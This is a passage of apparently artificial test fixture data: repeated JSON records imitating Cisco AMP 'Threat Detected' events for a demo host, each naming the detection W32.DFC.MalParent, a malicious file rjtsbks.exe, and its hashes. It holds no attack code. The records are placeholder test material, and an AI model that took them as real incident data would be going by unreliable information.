Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":598000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":535000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":520000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163593","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163592","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163591","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163590","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163589","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163588","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163587","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163586","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":395000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163585","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 